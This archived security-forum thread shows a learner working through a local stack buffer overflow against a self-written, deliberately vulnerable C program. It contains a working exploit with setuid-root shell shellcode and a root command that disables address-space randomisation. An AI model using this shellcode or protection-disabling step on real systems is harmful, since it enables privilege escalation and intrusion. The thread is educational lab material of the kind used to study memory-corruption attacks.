Results 1 to 9 of 9

Thread: Buffer Overflow

  1. #1
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default Buffer Overflow

    I was wondering if anyone could make a tutorial or a video thats demonstrating a simple buffer overflow on BackTrack.. I tried allot of tutorials already but none of them work on BackTrack.

  2. #2
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    What exactly do you need? A simple theoretical example with C source code and debugger or....something more complex (in this 2nd case I cannot help you)

  3. #3
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    I would like to exploit this code
    Code:
    #include <stdio.h>
    #include <stdlib.h>
    
    // 1024 bytes buffer
    // 4 bytes to overwrite ebp
    // 4 bytes to overwrite eip
    // 1032 bytes :)
    
    void viewer(char *string)
    {
    char buffer[1024];
    
    strcpy(buffer,string);
    
    printf("You have entered: %s\n",buffer);
    
    return;
    }
    
    int main(int argc, char *argv[])
    {
    
    if(argc < 2)
    {
      printf("%s <something> \n",argv[0]);
      return 0;
    }
    
    viewer(argv[1]);
    return 0;
    }
    with a shellcode.

    I tried various tut's already but none of them seem to work on BackTrack.

    Like when I load an egg and then use an eggfinder the address changes all the time..

  4. #4
    Member
    Join Date
    Jun 2006
    Posts
    107

    Default

    Dear UnnamedOne,

    Could you please check this thread:
    http://forums.remote-exploit.org/showthread.php?t=14255

    We have been discussing recreating buffer overflows on known exploits, we will be happy to join us

  5. #5
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    mmm....If i've not misunderstood, your problem is the randomization of memory (kernels starting from 2.6.12 add a stack protection by default).

    type from shell (as root):

    Code:
    echo 0 > /proc/sys/kernel/randomize_va_space
    it should work 'til the next reboot.....

  6. #6
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    Quote Originally Posted by kanto.86 View Post
    mmm....If i've not misunderstood, your problem is the randomization of memory (kernels starting from 2.6.12 add a stack protection by default).

    type from shell (as root):

    Code:
    echo 0 > /proc/sys/kernel/randomize_va_space
    it should work 'til the next reboot.....
    I really got to thank you Works great now!

    EDIT: Well, it works by loading an egg, but not with this code..

    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    #define NOP 0x90      // defining the NOP 
    #define VUL_FILE "./vuln"
    
    char shellcode[] =
    		 "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
    		"\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
    		"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e" // our shellcode
    		"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
    		"\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
    
    unsigned long get_sp(void)
    {
    	__asm__("movl %esp, %eax");        // this function returns the stack pointer address, hopefully where
    }                                                                                 // our shellcode is stored.
    
    int main(int argc, char *argv[], char **envp)
    {
    	int buff = 1032;            // size of the vuln buffer.
    	unsigned long addr;       // addr of shellcode.
    	char *ptr;     // used for adding nops etc.
    	if(argc > 1)
    		buff = atoi(argv[1]);      // if the user supplies a size, use this instead.
    
    	if((buff % 4) != 0)                                              // if the size is not a mem addr (divisable by 4)
    		buff = buff + 4 - (buff % 4);      // add 4 to it, take away the remainder (makes it divisable by 4)
    
    	if((ptr = (char *)malloc(buff)) == NULL)     // check to see you allocated enough memory.
    	{
    		printf("Error allocating memory.\n");
    		exit(0);
    	}
    	addr = get_sp();                  // get the address of our shellcode hopefully.
    	memset(ptr, NOP, buff);         // fill the buffer with NOPS making our chances higher.
    	memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode));    // store the shellcode in the buffer.
    	*(long *)&ptr[buff - 4] = addr;        // make eip point to our shellcode.
    	execl(VUL_FILE, "exploit example1", ptr, NULL);      // execute the vuln program with our NOPS&shellcode in the buffer.
    	printf("Addr: %s\n",addr);
    	return 0;
    }

  7. #7
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    The source code appears to be ok. The only other information I have to give you is that some OS mark the stack as "not executable" (precisely to prevent stack overflow, so this is because heap overflow and return-into-libc exist ).

    I think you should try to look at the thread posted by l1nuxant_ee...My advice is to try one of the known exploit and see what happen: if everything works, an error may be present in your code. Otherwise may the stack be "not executable" and we have to change this setting....(or we need the help of someone more expert )

  8. #8
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    Quote Originally Posted by kanto.86 View Post
    The source code appears to be ok. The only other information I have to give you is that some OS mark the stack as "not executable" (precisely to prevent stack overflow, so this is because heap overflow and return-into-libc exist ).

    I think you should try to look at the thread posted by l1nuxant_ee...My advice is to try one of the known exploit and see what happen: if everything works, an error may be present in your code. Otherwise may the stack be "not executable" and we have to change this setting....(or we need the help of someone more expert )
    Don't ask me why, but I removed
    Code:
    addr = get_sp();                  // get the address of our shellcode hopefully.
    and changed
    Code:
    unsigned long addr;       // addr of shellcode.
    to
    Code:
    unsigned long addr = get_sp();       // addr of shellcode.
    and now the code works fine

    Time to learn remote buffer overflow I think now

  9. #9
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    Haha! Cool !! We don't ask for this mistery of C but we are happy that everythings now work. Great !

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •